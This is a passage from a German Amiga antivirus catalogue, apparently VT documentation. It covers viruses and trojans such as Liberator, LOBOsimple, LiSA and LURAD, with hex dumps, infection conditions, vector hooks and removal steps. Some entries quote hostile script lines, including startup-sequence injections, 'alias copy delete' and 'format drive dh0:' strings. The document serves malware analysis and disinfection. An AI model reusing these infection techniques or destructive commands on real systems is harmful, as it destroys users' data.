  618.             in DH0 bei mir (Auszug):
  619.           execute s:startup-sequence2
  620.           cv >NIL:        ;also fast am Schluss !!!!
  621.           endcli >NIL:
  622.  
  623.               DH1 bei mir= Wechselplatte zu der Zeit nicht gemounted
  624.  
  625.            in DH2 bei mir (AusZug):
  626.           LoadWB
  627.           cv >NIL:        ;also fast am Schluss !!!!!
  628.           EndCLI >NIL:
  629.  
  630.            in DH3 bei mir:
  631.           LoadWB -debug
  632.           cv >NIL:        ;also fast am Schluss !!!!!
  633.           endcli >NIL:
  634.          Es wurden ALLE 3 s-seq in EINEM Durchgang veraendert !!!!
  635.          MUESSEN Sie also nach dem Entfernen des VirusFiles AUCH loeschen
  636.          Das Virus-File cv wird NICHT kopiert !!!
  637.          Beim naechsten Start (vgl. s-seq) wird der Wert in .fastdir er-
  638.          hoeht. Auszug:
  639.                0000: 320A                                2.
  640.          spaeter wird .fastfile-Laenge von 2 auf 3 und dann auf 4 Bytes
  641.          erhoeht. Sobald erreicht ist: 3130300a = #100 wird ein Text
  642.          ausgegeben:
  643.   Congratulations your hard disk has been liberated of virus protection!!
  644.  
  645.          Hello from the Liberator virus v3.0 - Digital Deviant
  646.  
  647.                     The anti-anti-virus is here again!
  648.  
  649.                       Lets play trash the hard disk
  650.                          and ram the disk heads
  651.  
  652.                       Only hardcore belgian rave can
  653.                         truely liberate the mind!
  654.  
  655.                         The liberator 15/01/92
  656.  
  657.     Empfehlung: Liberator 3 und .fastdir loeschen . s.-seq in den
  658.                     den Ursprungszustand zuruecksetzen.
  659.         Hinweis: Durch die Virus-Programmierung kann es passieren, dass
  660.         nach der Aktivierung Locks auf .fastdir noch bestehen. VirusPrg
  661.         gibt den lock nicht frei. Diese Gefahr besteht nur, wenn sich
  662.         das aktive VirusPrg ueber ihre BootDisk (s-seq) gestartet hat.
  663.         VT meldet dann beim Loeschversuch DOS-Fehler. Entfernen Sie
  664.         dann bitte die Zeile aus der s-seq und booten Sie neu. Da das
  665.         VirusPrg nicht mehr aktiviert wird, koennen keine locks mehr
  666.         entstehen und das Loeschen der Virus-Files MUSS moeglich sein.
  667.         Fileerkennung mit VT getestet: 18.10.92
  668.  
  669.    - Liberator Virus V5.01
  670.          Fundort z.B.: CD-HOTTEST4/aa/2_0/disk2860.dms
  671.          Laenge: Impl4      7828
  672.          Laenge: ungepackt 16924
  673.          Weiterentwicklung von V3.0 (sehr viele source-Teile gleich)
  674.          Der "richtige" Name duerfte PV (s.u.) sein.
  675.          Liberator-Namensbegruendung s.u.
  676.  
  677.          Versucht durch Cli-Ausgabe zu taeuschen:
  678.   PV(Protect Vectors) v1.02 by Peter Stuer
  679.   July 22, 1992 FREEWARE
  680.  
  681.   Reset vectors ok, Nothing resident, Trackdisk.device not intercepted,
  682.   DoIO ok, VBlank ok, low interrupts ok, dos.library not intercepted.
  683.  
  684.   monitoring vectors...
  685.  
  686.   Fully Kickstartv2.xx compatible, stops all viruses, checks disk-validators,
  687.   Use run to push this program into the background.
  688.  
  689.     Die Tests wurden mit df0: und df1: durchgefuehrt.
  690.     Nach der Cli-Ausgabe wird gesucht und nach df1: kopiert
  691.          :c/run, :c/br  (runback), :s/.info (nach o ein Leerzeichen = $20)
  692.          .info-Laenge: 4 Bytes, .info-Startinhalt bei mir: $00000064
  693.          Hinweis: Sie MUESSEN also neben dem eigentlichen Virusfile auch
  694.          .info in s loeschen.
  695.          Kopiert :c/PV . Dabei wird IMMER der letzte Buchstabe des Files
  696.          zufallsbedingt geaendert (also aus PV wird Pe oder Pb usw.) .
  697.          Vermutlich um die Erkennung ueber Filenamen unmoeglich zu
  698.          machen. Auf Disk wurde KEIN .fastdir angelegt.
  699.          Aendert die s.-seq . (MUESSEN Sie von Hand zuruecksetzen)
  700.           vorher:
  701.                cls
  702.           nach Befall:
  703.                br c:pe
  704.                cls
  705.         Nachtrag 01.12.93: Es liegt jetzt eine komplette Disk (PD-England)
  706.         vor (mit stars). Dank an den deutschen Zusender.
  707.         Tests wurden mit HD0: durchgefuehrt.
  708.         In das Rootverzeichnis wird ".fastdir",A0,20 (4 Bytes) kopiert.
  709.         Nach S wird ".info",20 (4 Bytes) kopiert.
  710.         Nach C wird kopiert:
  711.             - run  (2568)  bitte loeschen
  712.             - br   (948)   bitte loeschen
  713.             - pvx  (7828)  wird von VT erkannt
  714.         Die Aenderung des 3. Buchstaben wurde mehrfach nachvollzogen.
  715.         Aber es gibt immer noch die alte Disk (s.o.) und falls von
  716.         dieser Disk der Lib 5.01 aktiviert wird, so wird weiterhin der
  717.         2. Buchstabe geaendert !!!!
  718.         Nachweis:
  719.         Fileheaderblock Virusteil:
  720.         alte Version:  (Filename immer nur 2 Buchstaben)
  721.           01a0: 00000000 000014c8 0000027f 00000491 ...............
  722.           01b0: 02706200 00000000 00000000 00000000 .pb.............
  723.                 ^^
  724.           01c0: 00000000 00000000 00000000 00000000 ................
  725.         neue (gepackte) Version:  (Filename immer 3 Buchstaben)
  726.           01a0: 00000000 000016c2 00000408 000000b1 ................
  727.           01b0: 03707678 00000000 00000000 00000000 .pvx............
  728.                 ^^
  729.           01c0: 00000000 00000000 00000000 00000000 ................
  730.  
  731.         Aenderungen alle Versionen:
  732.         Aendert die s.-seq.:
  733.         vorher:
  734.            ;....
  735.            C:SetPatch QUIET
  736.            C:Version >NIL:
  737.            ;....
  738.         nachher:
  739.            ;....
  740.            C:SetPatch QUIET
  741.            br c:pvs
  742.            C:Version >NIL:
  743.            ;....
  744.         d.h. die Zeile wird variabel eingesetzt und nicht immer als
  745.              1. Zeile
  746.  
  747.         WICHTIG !!!!!  WICHTIG !!!!!
  748.         Aendert die Shell-Startup (falls vorhanden):
  749.         vorher:
  750.              ;......
  751.              Prompt "%N.%S> "
  752.              Alias Clear "Echo *"*E[0;0H*E[J*" "
  753.              Alias XCopy "Copy CLONE "
  754.              ;......
  755.         nachher:
  756.              ;......
  757.              Prompt "%N.%S> "
  758.              Alias Clear "Echo *"*E[0;0H*E[J*" "
  759.              Alias XCopy "Copy CLONE "
  760.              ;liberatorV - controlling me!
  761.              alias copy delete
  762.              alias delete "echo *"No file to delete, can't find*""
  763.              ;......
  764.         MERKE !!!!!!
  765.         Falls Sie von einem Medium mit dieser Shell-Startup gebootet
  766.         haben, genuegt es NICHT, nur die Zeilen aus der Shell-Startup
  767.         zu entfernen und neu abzuspeichern. Durch die Abarbeitung der
  768.         Shell-Startup wurde im Computer der copy-Befehl bereits durch
  769.         den delete-Befehl ersetzt. Sie MUESSEN einen Reset ausfuehren,
  770.         um die Abarbeitung der NEUEN RICHTIGEN Shell-Startup zu er-
  771.         zwingen !!!!!!!!
  772.  
  773.          Das VirusFile enthaelt noch folgenden Text:
  774.      Congratulations this disk has been liberated of virus protection!!
  775.  
  776.           Hello from the Liberator virus v5.01 - Random Disaster
  777.  
  778.                    The anti-anti-virus is here again!
  779.  
  780.                      Lets play trash the hard disk
  781.                         and ram the disk heads
  782.  
  783.                            The piracy curse
  784.                    Liberator V - The future is near.
  785.  
  786.           Look out for Liberator VI - The final nightmare ...
  787.                coming soon from a lame swapper near you!
  788.  
  789.      Respect to the virus masters Lamer Exterminator,crime & Contrast.
  790.  
  791.                And remember - be excellent to each other!
  792.  
  793.                          The liberator 27/07/92
  794.                            Virus Generation :
  795.  
  796.     Diesen Text habe ich auf dem Bildschirm im Gegensatz zu Lib 3
  797.         NICHT gesehen. 
  798.         Empfehlung: Liberator 5, .info loeschen, s.-seq. UND shell-start-
  799.         up (falls vorhanden) aendern .
  800.         Hinweis: Durch die Virus-Programmierung kann es passieren, dass
  801.         nach der Aktivierung Locks auf s/.info und .fastdir noch bestehen.
  802.         VirusPrg gibt den lock nicht frei. Diese Gefahr besteht nur, wenn
  803.         sich das aktive VirusPrg ueber ihre BootDisk (s-seq) gestartet hat.
  804.         VT meldet dann beim Loeschversuch DOS-Fehler. Entfernen Sie
  805.         dann bitte die Zeile aus der s-seq und booten Sie neu. Da das
  806.         VirusPrg nicht mehr aktiviert wird, koennen keine locks mehr
  807.         entstehen und das Loeschen der Virus-Files MUSS moeglich sein.
  808.         Fileerkennung mit VT getestet:         18.10.92
  809.         Fileerkennung gepackt mit VT getestet: 01.12.93
  810.         VT versucht auch .info und .fastdir zu loeschen. Geht aber nicht,
  811.         wenn locks vorhanden sind.
  812.         Speichererkennung mit VT getestet:     01.12.93
  813.         VT versucht den Process abzuschalten. In VT/Listen/Tasks darf
  814.         "Background CLI [c:pxy]" nicht mehr auftauchen. Sie muessen aller-
  815.         dings mit einem GURU rechnen. Lieber ist es mir, wenn Sie in
  816.         VT/Tools einen KReset ausloesen !!!!!
  817.  
  818.    - LibSearcher.BB-Virus   BB
  819.         Stand: 23.08.94
  820.         Einige AntiVirusPrge erkennen einen Unkown-Virus. ( (1) oder (2) )
  821.         Das stimmt NICHT.
  822.         VT erkennt Noboot (seit 02.11.90 !!!!)
  823.         Lesen Sie bitte nach bei VT-andere.BB unter Noboot. Danke
  824.         Vielleicht aendern die anderen AntiVirusPrge die Meldung beim
  825.         naechsten Update.
  826.  
  827.    - LinkEm-Link  File
  828.         Lauffaehigkeit: wahrscheinlich nur KS1.3
  829.         VT glaubt ein File gefunden zu haben, bei dem mehrere Files mit
  830.         dem Programm LinkEm zusammengesetzt wurden.
  831.         VT empfiehlt Loeschen
  832.  
  833.    - LiSA-2.0-Trojan   Zerstoerung
  834.         Keine verbogenen Vektoren
  835.         Nicht Resetfest
  836.         68040: Ja
  837.         Bekannte Filenamen:
  838.             - 020_Upgrader.exe   L: 1660 Bytes
  839.             - 020_Upgrader.dat  (unwichtig)
  840.         Nach FileID sollen Files im C-Verz. nachgebessert werden.
  841.         In Wahrheit werden die Files in C: mit ABSICHT zerstoert. Es gibt
  842.         KEINE Rettung.
  843.         z.B. Addbuffers:
  844.             vorher:                      nachher:
  845.         00: 000003f3 00000000 ........ : 284c6953 415e4655 (LiSA^FU
  846.         08: 00000001 00000000 ........ : 434b5550 2076322e CKUP v2.
  847.         10: 00000000 00000066 .......f : 4f206279 204e6f4e O by NoN
  848.         18: 000003e9 00000066 .......f : 616d652f 4c697361 ame/Lisa
  849.         20: 4e55ffdc 48e73332 NU..H.32 : 2955ffdc 48e73332 )U..H.32
  850.         Es handelt sich um ein Scriptfile, das mit einem Programm in ein
  851.         ausfuehrbares File umgewandelt wurde.
  852.         Ablauf:
  853.         - RexxMast MUSS geladen sein.
  854.         - Das File decodiert sich selbst
  855.         - Es werden zwei Files in RAM: angelegt:
  856.          - Upgrade.dat  (ist das delete-file aus c:)
  857.          - UpDate.temp  (ist eine Liste mit den Files in c:)
  858.         - Die Liste wird durchlaufen und in jedes File an den Anfang
  859.           ein Text geschrieben.
  860.         - Nach der Fertig-Meldung sollen Sie einen Reset ausfuehren.
  861.         VT bietet fuer 020_Upgrader.exe nur Loeschen an.
  862.         VT bietet fuer defekte Files in c: nur Loeschen an.
  863.         Einfacher ist es, wenn Sie selbst das C-Verz. neu aufspielen.
  864.         Hinweis 21.07.96: Ein anderes Antivirusprogramm erkennt im Moment
  865.          in sehr vielen REXX-Programmen einen LiSA-Trojan. Dabei
  866.          handelt es sich sehr haeufig um FEHL-Erkennungen. Im Juli 96
  867.          ist bisher nur EIN ECHTER Trojan (Name siehe oben) bekannt. Ich
  868.          gehe davon aus, dass beim naechten Update der Fehler behoben
  869.          sein wird.
  870.  
  871.    - LiSA-3.0-Trojan   Zerstoerung
  872.         anderer moeglicher Name: ScanEbola97
  873.         Keine verbogenen Vektoren
  874.         Nicht Resetfest
  875.         68040: Ja
  876.         Bekannte Filenamen:
  877.             - ScanEbola97   L: 7004 Bytes
  878.         Nach FileID: ScanEbola97: Scans your hard-drive for the
  879.                      Ebola97-virus.
  880.         In Wahrheit werden bei ALLEN (!!!!) Files auf SYS: die ersten
  881.         16 Bytes veraendert.
  882.         z.B. Dir:
  883.             vorher:                      nachher:
  884.         00: 000003f3 00000000 ........ : 4c695341 20465543 LiSA FUC
  885.         08: 00000001 00000000 ........ : 4b555020 76332e30 KUP v3.0
  886.         10: 00000000 00000353 .......S : 00000000 00000353 .......S
  887.         18: 000003e9 00000353 .......S : 000003e9 00000353 .......S
  888.         Da nur wenige Bytes veraendert werden, kann VT versuchen, aus-
  889.         fuehrbare Files zu retten. Bei Daten-Files (.info, lha usw.)
  890.         ist KEINE (!!!!) Rettung durch VT moeglich.
  891.         Ob sich der Zeitaufwand lohnt muessen Sie selbst entscheiden.
  892.         Ich habe fuer eine 270MB Syquest zwei Tage gebraucht.
  893.         Bitte installieren Sie unbedingt zuerst die Workbench neu.
  894.         Es werden damit schon viele Files wieder brauchbar. Danach gehen
  895.         Sie bitte mit Sp-File-Sp und DirFTest Unterverzeichnis fuer
  896.         Unterverzeichnis durch.
  897.         Bei Data-Files ersetzt VT das "L" nach der Erkennung durch ";"
  898.         also ";iSA". Manchmal koennen Sie solche Files (z.B. startup-
  899.         sequence) noch durch Nacharbeit mit einem Editor retten.
  900.         Fuer Icons usw. dagegen kenne ich keine Loesung.
  901.  
  902.    - Little Sven  BB   anderer Name: Cameleon, Chameleon
  903.          BB ist codiert (immer neu !!).
  904.          Ein Teil der Codierung: eor.b d1,(a0)+
  905.          Decodiert ist im Speicher zu lesen:
  906.             The Curse of Little Sven!
  907.          Cool, BeginIo, Supervisor, DisplayAlert im Programm dann: DoIo,
  908.          FreeSignal
  909.  
  910.          Vermehrung: BB
  911.  
  912.          Schaeden:
  913.          - Codiert FileDatenBloecke  Kennung: $ABCD0008
  914.          (Langwort 0 eines Blocks)
  915.          Die Programme laufen, solange Little Sven im Speicher aktiv ist.
  916.          Abhilfe: VT kann diese Datenbloecke decodieren. Falls Sie also
  917.          beim FileTest oder BlockKetteTest den Requester Little Sven
  918.          erhalten, brechen Sie bitte ab und starten BlockITest .
  919.          - Verschiebt den Original-Bootblock codiert nach Block2+3.
  920.            VT kann dies rueckgaengig machen (klicken Sie auf O-BB.
  921.            Dieses Gadget war frueher Lam3 und schreiben Sie den BB zurueck).
  922.            A B E R  !!!!!!!!
  923.            Falls Block 2+3 vorher von einem File belegt war, so wurden
  924.            durch das Virusprogramm 2 Datenbloecke zerstoert. Das File
  925.            ist unbrauchbar. Es ist KEINE Rettung moeglich. VT sollte
  926.            bei BlockKetteTest b.T.Data Block 2 zeigen. Oeffnen Sie
  927.            den FileRequester (Sp-File-Sp) und loeschen Sie das File.
  928.          - Enthaelt eine Routine, die 80 Steps nach innen ausfuehrt und
  929.            dabei Daten schreibt. Diese Routine habe ich NICHT erreicht
  930.            bei Tests. Alle Daten auf der Disk waeren dann unbrauchbar ???
  931.          Wird erzeugt beim Starten von XCopyPro V6.5  (Laenge:28336)
  932.          und kopiert sich dann weiter.
  933.          Hinweis: im April 92 lag die OrigVersionsNr. von Xcopy erst
  934.             bei 5.2x (glaub ich).
  935.          Gefunden in: xcopy65e.lha  Laenge: 25360
  936.  
  937.  
  938.    - LoadWB-DFF006    File    loeschen
  939.          Im File ist zu lesen:
  940.             41f900df f0065210 10100200 000f6604 A.....R.......f.
  941.                   ^^^^^^^
  942.             206c6f61 64776220 33382e39 20283330  loadwb 38.9 (30
  943.             2e332e39 32290a0d 0000776f 726b6265 .3.92)....workbe
  944.          Dieses DFF006 kommt in meinem LoadWB NICHT vor. Empfehlung
  945.          deshalb loeschen.
  946.  
  947.    - LOBOsimple-Virus     Linkvirus  
  948.       Namensbegruendung:    
  949.            Im decodierten LinkTeil ist zu lesen: 
  950.            ffff4e75 4e7a0801 4e734454 00000000 ..NuNz..NsDT....
  951.                ;....
  952.            2f480006 41fa050e 2081205f 4e733e4c /H..A... . _Ns>L
  953.            4f424f73 696d706c 653c4cdf 4eb900f9 OBOsimple<L.N...
  954.                ;....
  955.            7fff4a80 4e752323 506c695a 20646f6e .J.Nu##PliZ don
  956.            74207368 6f6f7421 20492061 6d204e4f t shoot! I am NO
  957.            54206120 56495255 53212323 536e6f6f T a VIRUS!##Snoo
  958.            70446f73 000041fa 04164c90 00ff6100 pDos..A...L...a.
  959.                ;....
  960.            00086100 03604e75 3e62794d 415a4539 ..a..`Nu>byMAZE9
  961.            363c6100                            6<a.
  962.       Fileverlaengerung: #1912 Bytes
  963.       Nicht Resetfest
  964.       Verbogene Vektoren: LoadSeg und TRAP1
  965.         Speicherverankerung:
  966.            - Suche nach SnoopDos und DT (Debugger ??) siehe auch Hinweis
  967.              falls gefunden, dann Ende
  968.            - Loadseg schon verbogen $4E41
  969.            - Loadseg wird verbogen und zwar ins ROM
  970.            - im ROM wird der TRAP1-Befehl gesucht 4e41 = "NA"
  971.            4e5d4e75 4e414d45 2c535452 494e472f N]NuNAME,STRING/
  972.                     ^^^^                           ^^
  973.            - $84 oder VBR+$84 wird verbogen  
  974.         Linkvorgang:
  975.            - mit LoadSeg und TRAP1
  976.            - Medium validated
  977.            - keine Disk (zuwenig Gesamtbloecke)
  978.            - mind. #30 Block frei
  979.            - Filename enthaelt nicht ".", "-", "!", "VIR" oder "vir"
  980.            - Das Virusteil codiert sich immer neu mit $DFF006
  981.            - Link als neuer erster Hunk ($1DA) vor das Originalfile
  982.              Es muessen also die anderen Hunks nachbearbeitet werden.
  983.              Da das Virusteil nicht sehr viele Hunktypen kennt, ent-
  984.              stehen auch defekte Files (bei Tests nachgewiesen) .
  985.       Hinweis eines Users Nov.98: Danke
  986.         Bei DT handelt es sich sicherlich um DOSTrace von Peter Stuer
  987.         (z.B. auf der Meeting_Pearls_III:Pearls/debug/Snooper/DOSTrace
  988.         oder im AmiNet unter util/moni zu finden), weil:
  989.          1. DT ist im Prinzip das selbe wie SnoopDos
  990.          2. Der Filename (und somit der Taskname) von DOSTrace lautet im
  991.             Originalarchiv DT
  992.  
  993.  
  994.    - LOBOweird-Inst.      Installer
  995.          Ein uncodierter LOBOweird-Virus
  996.          Rest siehe bei LOBOweird
  997.  
  998.    - LOBOweird-Virus     Linkvirus
  999.       Namensbegruendung:    
  1000.            Im decodierten LinkTeil ist zu lesen: 
  1001.            4c4f424f 77656972 642e48e7 808041fa LOBOweird.H...A.
  1002.              ;....
  1003.            4e732041 4e54492d 56495220 50415443 Ns ANTI-VIR PATC
  1004.            48206279 204d415a 45273937 21204eb9 H by MAZE'97! N.
  1005.                     6<a.
  1006.       Fileverlaengerung: mind. #2100 Bytes
  1007.       Nicht Resetfest
  1008.       Verbogene Vektoren: LoadSeg und TRAP (soll jetzt variabel sein)
  1009.       Speicherverankerung:
  1010.            - "LOBO" wird nicht gefunden  
  1011.            - Loadseg wird verbogen und zwar ins ROM   
  1012.            - im ROM wird der TRAP-Befehl gesucht. Der Trap soll jetzt
  1013.              variabel sein. Es wird mit TRAP0 ($4e40) begonnen. In all
  1014.              meinen ROMs wird aber erst TRAP1 (siehe oben bei LOBOsimple)
  1015.              gefunden.
  1016.            - es soll also ab $80 oder VBR+$80 variabel verbogen werden.
  1017.              Bei mir wird also immer $84 oder VBR+$84 verbogen.
  1018.       Linkvorgang:
  1019.            - mit LoadSeg und TRAP
  1020.            - File groesser   #7913 Bytes
  1021.            - File kleiner  #255600 Bytes
  1022.            - Medium validated
  1023.            - keine Disk (mind. #91978 Bloecke)
  1024.            - mind #30 Block frei
  1025.            - Filename enthaelt nicht ".", "-", "!", "VIR" oder "vir"
  1026.            - Das Virusteil codiert sich immer neu mit $DFF006
  1027.            - Es entstehen immer verseuchte Files mit 2 Hunks
  1028.              Der 1. Hunk enthaelt das Virusteil. Der 2.Hunk ist das ganze
  1029.              Originalfile. Leider kann man den 2.Hunk nicht einfach zurueck-
  1030.              schreiben, da 8 Bytes im Originalfile codiert werden. Es muss
  1031.              im Virusteil das Codier-Langwort gesucht werden. Dieses LW
  1032.              aendert sich immer in Abhaengigkeit von $DFF006.
  1033.  
  1034.  
  1035.    - LOGIC BOMB   anderer Name: PARADOX I   s.d.
  1036.  
  1037.    - LOOK-BBS-Trojan  Name uebernommen nicht nachvollziehbar im Speicher
  1038.          Laenge gepackt:  1392 Bytes
  1039.          Laenge entpackt: 1456 Bytes
  1040.          Verbogener Vektor: Cool auf Endlos-Farbroutine NACH DisplayAlert
  1041.          Keine Vermehrungsroutine
  1042.          Wahrscheinlich von CONMAN.
  1043.          Im entpackten File ist zu lesen:              
  1044.            00000000 00536e6f 6f70446f 7300646f .....SnoopDos.do
  1045.            732e6c69 62726172 79004155 583a0042 s.library.AUX:.B
  1046.            42533a55 5345522e 44415441 00434f4e BS:USER.DATA.CON
  1047.            3a302f30 2f333230 2f313030 2f524541 :0/0/320/100/REA
  1048.            444d4521 004e494c 3a00433a 4d4f554e DME!.NIL:.C:MOUN
  1049.            54204155 583a0000 0c200a20 0a1b5b32 T AUX:... . ..[2
  1050.          Gefahr nur fuer Mailbox-Betreiber.
  1051.          Empfehlung loeschen.
  1052.          Sucht nach SnoopDos.
  1053.          Versucht AUX anzumelden Nein dann Ende
  1054.          Schreibt aus USER.DATA Teile nach AUX:
  1055.          Wahrscheinlich ein Einbruchsversuch.
  1056.          Oeffnet zur Taeuschung ein Fenster und gibt Reset-Text aus:
  1057.            0a1b5b32 3b316d1b 5b3b3432 6d20506c ..[2;1m.[;42m Pl
  1058.            65617365 20576169 74202121 21202020 ease Wait !!!
  1059.            1b5b306d 0a1b5b32 3b316d1b 5b3b3432 .[0m..[2;1m.[;42
  1060.            6d204c6f 6164696e 67204441 54412e2e m Loading DATA..
  1061.              ;.....
  1062.            534f5252 59204d49 5353494e 47204441 SORRY MISSING DA
  1063.            54412046 494c4520 32202120 504c4541 TA FILE 2 ! PLEA
  1064.            53452052 45424f4f 54202121 21201b5b SE REBOOT !!! .[
  1065.          Wem das noch nicht reicht, bekommt noch einen DisplayAlert
  1066.          Text angeboten: FATAL HARDWARE ERROR  usw. und eine Endlos-
  1067.          schleife (s.o.) .
  1068.  
  1069.  
  1070.    - LOOP-COMBO-Virus     File  Laenge: 1848 Bytes
  1071.          Auf Disk als Disk-Validator getarnt
  1072.          KS 1.3: ja
  1073.          KS 2.0: nein
  1074.          Vermehrung: nein   reines Zerstoerungsprogramm
  1075.          Im File ist an $490 uncodiert zu lesen:   
  1076.            00242429 000c222a 02d07041 6e642041 .$$).."*..pAnd A
  1077.            6761696e 20467563 6b656420 75702100 gain Fucked up!.
  1078.          Decodiert mit eori.b d1,(a1)+ ist im File zu lesen:
  1079.            144d4954 204d4952 204e4943 48542c20 .MIT MIR NICHT,
  1080.            44552041 46464520 21212121 21000100 DU AFFE !!!!!...
  1081.            0a1e5645 52535543 4860204c 49454245 ..VERSUCH` LIEBE
  1082.            52204d41 4c204549 4e454e20 4c4f4f50 R MAL EINEN LOOP
  1083.            2d434f4d 424f2121 0001000a 284f4445 -COMBO!!....(ODE
  1084.                  usw.
  1085.          Schaden:
  1086.          Sobald unter KS 1.3 eine Disk mit ungueltigem BitMapZeiger
  1087.          eingelegt wird, wird das Teil gestartet.
  1088.          Kopfstep Disk danach bad
  1089.          Versuchen Sie mit Disksalve noch etwas zu retten.
  1090.          Textausgabe mit DisplayAlert .
  1091.          Loeschen Sie bitte unbedingt das Teil auch wenn SIE schon
  1092.          KS 2.0 oder mehr haben. Falls Sie so eine Disk weitergeben
  1093.          kann sonst ihr Bekannter mit Ks1.3 eine boese Ueberraschung
  1094.          erleben. Spielen Sie bitte auch einen sauberen Disk-Validator
  1095.          auf. Danke
  1096.  
  1097.    - LOVEMACHINE-Virus  BB  Warhawk-Clone  s.u.
  1098.            44452042 59202020 4c204f20 56204520 DE BY   L O V E
  1099.            4d204120 43204820 49204e20 45273930 M A C H I N E'90
  1100.  
  1101.    - LSD!      (noch ein SCA!)
  1102.  
  1103.    - lummin-Virus  File  siehe unten bei XaCa-Virus
  1104.  
  1105.    - LUPO-Virus   File   Nano-Clone  s.u.
  1106.               Laenge PP gepackt: 1420 Bytes
  1107.               Laenge ungepackt : 1484 Bytes
  1108.       Name des Files VOR der Vermehrung wahrscheinlich memclear
  1109.       Namensbegruendung: s.u.
  1110.       Unterschiede zu Nano:
  1111.           - anderer Text
  1112.           - unsichtbarer Filename soll " " sein
  1113.        Eine Meisterleistung !!!!!
  1114.            3a200000 00000000 3a732f73 74617274 : ......:s/start
  1115.            ^^^^^^
  1116.            75702d73 65717565 6e636500 20000000 up-sequence. ...
  1117.            0000200a 00c80a2e 2e2e6120 6e657720 .. .......a new
  1118.            76697275 73207275 6e6e6572 2066726f virus runner fro
  1119.            6d204c20 55205020 4f202120 2000140a m L U P O !  ...
  1120.  
  1121.              ^^ = ": ",0 = unsichtbarer Filename fuer Root
  1122.       Die Vermehrung von LUPO findet UNGEPACKT statt !!! 
  1123.       Weiterhin ist bemerkenswert, dass in die startup-sequence eine
  1124.       Zeile mit einem Leerzeichen und return eingebaut werden soll. Nach
  1125.       meinem Wissensstand wird ein normales Leerzeichen in der startup-
  1126.       sequence nicht als Filename , sondern als Leerzeile behandelt.
  1127.       Also wird das vermehrte Virusteil NIE aufgerufen.
  1128.       Speichererkennung von VT: als LUPO
  1129.       Fileerkennung von VT    : als NANO   mehr ist die Sache nicht wert.
  1130.  
  1131.    - LURAD-Trojan    Zerstoerung
  1132.          anderer moeglicher Name: HDprotect-Trojan
  1133.          Filename:hdprotect
  1134.          Filelaenge gepackt:   3984 Bytes
  1135.          Filelaenge entpackt: 20200 Bytes
  1136.          Entpackt ist im File zu lesen:
  1137.             756e203e 4e494c3a 20666f72 6d617420 un >NIL: format
  1138.             64726976 65206468 303a206e 616d6520 drive dh0: name
  1139.             4c555241 44007275 6e203e4e 494c3a20 LURAD.run >NIL:
  1140.             666f726d 61742064 72697665 20646831 format drive dh1
  1141.             3a206e61 6d65204c 55524144 20515549 : name LURAD QUI
  1142.             434b0072 756e203e 4e494c3a 20666f72 CK.run >NIL: for
  1143.             6d617420 64726976 65206468 323a206e mat drive dh2: n
  1144.             616d6520 484f525f 554e4745 20515549 ame HOR_UNGE QUI
  1145.             434b0057 6f726b69 6e67206f 6e204448 CK.Working on DH
  1146.              ;....
  1147.             33336d48 61726464 69736b20 70726f74 33mHarddisk prot
  1148.             65637420 76657273 696f6e20 362e3234 ect version 6.24
  1149.          Versucht durch Textausgabe in Shell zu taeuschen. Soll dh0,
  1150.          dh1 und dh2 formatieren.
  1151.  
  1152.    - LVirus-$F8    Linkvirus
  1153.       Namensbegruendung: Fileverlaengerung #248 = $F8, da kein Text im
  1154.                          Linkteil.
  1155.       Fileverlaengerung: #248 Bytes
  1156.       Nicht Resetfest
  1157.       Verbogener Vektor: DosWrite
  1158.       Fehlerquelle: kein Test auf KS1.3 (DosWrite)
  1159.       Speicherverankerung:
  1160.            - Test ob schon im Speicher
  1161.            - DosWrite wird verbogen
  1162.       Linkvorgang:
  1163.            - File noch nicht verseucht
  1164.            - CodeHunk wird gefunden ($3E9)
  1165.            - 1.Hunk nicht groesser als #8192  (wg. Sprung)
  1166.            - Das erste LW des 1.Hunks wird durch bsr Virus ($6100wxyz)
  1167.              ersetzt.
  1168.            - Link hinter den 1.Hunk
  1169.       VT versucht Write im Speicher zurueckzusetzen.
  1170.       VT versucht den Fileausbau.
  1171.  
  1172.    - LZ-Virus
  1173.       Linkvirus, verlaengert ein File um 400 Bytes
  1174.       testet Hauptversionsnummer der dos.library, falls groesser 34 oder
  1175.       kleiner 33 keine Aktivierung, verbiegt GlobVec 06 = Write
  1176.       linkt sich hinter CodeHunk (meist 1.) und ersetzt z.B. $4e75 = rts
  1177.       durch $6004 = bra.s 4 oder $4eee = jmp durch $60XY
  1178.       Muss deshalb HunkAnzahl nicht veraendern, sondern nur die Anzahl
  1179.       der Langwoerter des befallenen Hunks um $64 erhoehen.
  1180.       Bedingungen fuer ein File:
  1181.       0.LW = $3f3    (ausfuehrbar)
  1182.       1.LW = 0       (keine Resident-Libs zu laden)
  1183.                      (kein Overlay)
  1184.          es wird ein CodeHunk gefunden $3e9
  1185.       der gefundene CodeHunk ist laenger als #1000 Bytes
  1186.       Ursprung:   (Geruecht 14.07.91)
  1187.       SOLL ein LZ-Entpackungsprogramm sein ????   (hab ich nicht)
  1188.       Hinweis: MehrfachLinks an ein File gefunden !!!
  1189.       Hinweis 01.09.92: Ab VT2.44 sollten mehrere LZ-Virus-Links ans glei-
  1190.       che File in einem Durchgang ausgebaut werden. Falls nein, melden Sie
  1191.       sich bitte. Danke
  1192.  
  1193.    - M_CHAT-Trojan   File   Laenge ungepackt: 13492 Bytes
  1194.       Von der Definition kein Virus, da keine Vermehrungsroutine.
  1195.       Keine verbogenen Vektoren.
  1196.       Braucht AmiExpress-Port, sonst Ausgabe (bei mir)
  1197.                 Couldn't create reply port
  1198.       und Programmende.
  1199.       Im lha-Archiv liegt das Programm ungepackt.
  1200.       Durch das Doc-File im lha-Archiv wird ein Taeuschungsversuch unter-
  1201.       nommen:
  1202.  =============================================================================
  1203.  ||   MULTINODE CHAT DOOR VERSION V2.3 [BUGFIXED] FROM PORTAX OF WIBBLE     ||
  1204.  =============================================================================
  1205.  
  1206.  What is it?!
  1207.  ------------
  1208.  Well M_Chat Is a MultiChat Node Door , Quite simple actually.
  1209.  
  1210.  Installation!
  1211.  -------------
  1212.  M_Chat is VERY easy to install!
  1213.  Make sure you have you boards main dir. assigned as BBS:
  1214.  And your doors dir. assigned as: DOORS:
  1215.  Just copy the actual proggie: M_Chat to your DOORS: dir.
  1216.  Add the following line to your BBS:COMMANDS/CUSTOMCOMMANDS or BBS.CMD
  1217.  file like this:
  1218.  
  1219.  ---------------------------cut here!
  1220.  *CHAT     XM010DOORS:M_Chat
  1221.  ---------------------------cut here!
  1222.  
  1223.  This is a great Multi_Node chat door for Amiexpress
  1224.  
